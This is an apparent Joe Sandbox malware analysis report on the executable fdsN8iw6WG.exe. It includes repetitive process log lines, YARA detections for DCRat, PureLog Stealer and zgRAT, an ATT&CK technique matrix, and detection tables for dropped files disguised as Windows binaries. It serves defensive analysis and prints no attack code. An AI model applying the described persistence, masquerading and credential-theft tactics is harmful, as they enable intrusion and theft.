Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Queries volume information: C:\Users\user\Desktop\fdsN8iw6WG.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Queries volume information: C:\Users\user\Desktop\fdsN8iw6WG.exe VolumeInformation
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Queries volume information: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe VolumeInformation
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Queries volume information: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Queries volume information: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe VolumeInformation
Source: C:\Program Files\Microsoft\sihost.exe	Queries volume information: C:\Program Files\Microsoft\sihost.exe VolumeInformation
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Queries volume information: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe VolumeInformation

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.2282454452.000000001306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fdsN8iw6WG.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sihost.exe PID: 5808, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: fdsN8iw6WG.exe, type: SAMPLE
Source: Yara match	File source: 0.0.fdsN8iw6WG.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2119928328.0000000000B52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft\sihost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: fdsN8iw6WG.exe, type: SAMPLE
Source: Yara match	File source: 0.0.fdsN8iw6WG.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft\sihost.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.2282454452.000000001306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fdsN8iw6WG.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sihost.exe PID: 5808, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: fdsN8iw6WG.exe, type: SAMPLE
Source: Yara match	File source: 0.0.fdsN8iw6WG.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2119928328.0000000000B52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft\sihost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: fdsN8iw6WG.exe, type: SAMPLE
Source: Yara match	File source: 0.0.fdsN8iw6WG.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft\sihost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	11 Process Injection	143 Masquerading	OS Credential Dumping	11 Security Software Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
fdsN8iw6WG.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
fdsN8iw6WG.exe	100%	Avira	HEUR/AGEN.1323342
fdsN8iw6WG.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\V10Cviyryl.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Microsoft\sihost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft\sihost.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft\sihost.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\FMuYuXzk.log	6%	ReversingLabs
C:\Users\user\Desktop\PvOoeAES.log	4%	ReversingLabs
C:\Users\user\Desktop\YehEOcJA.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\eWKdrIOo.log	8%	ReversingLabs
C:\Users\user\Desktop\iMBUyFOh.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\nASSbBeV.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\qcbjycVR.log	29%	ReversingLabs
C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
https://aka.ms/pscore68	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/pscore68	powershell.exe, 0000001E.00000002.2715540404.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2732238636.000002090BEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2714667755.0000025680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2739841439.0000021885321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2738740643.0000014189A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2751449420.00000284C8A51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001E.00000002.2715540404.0000020500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2732238636.000002090C107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2714667755.000002568022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2739841439.0000021885549000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2738740643.0000014189D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	fdsN8iw6WG.exe, 00000000.00000002.2260614296.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2715540404.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2732238636.000002090BEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2714667755.0000025680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2739841439.0000021885321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2738740643.0000014189A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2751449420.00000284C8A51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001E.00000002.2715540404.0000020500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2732238636.000002090C107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2714667755.000002568022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2739841439.0000021885549000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2738740643.0000014189D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000028.00000002.2714928586.00000284C6A97000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1526016
Start date and time:	2024-10-04 17:14:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	63
Number of new started drivers analysed:	0
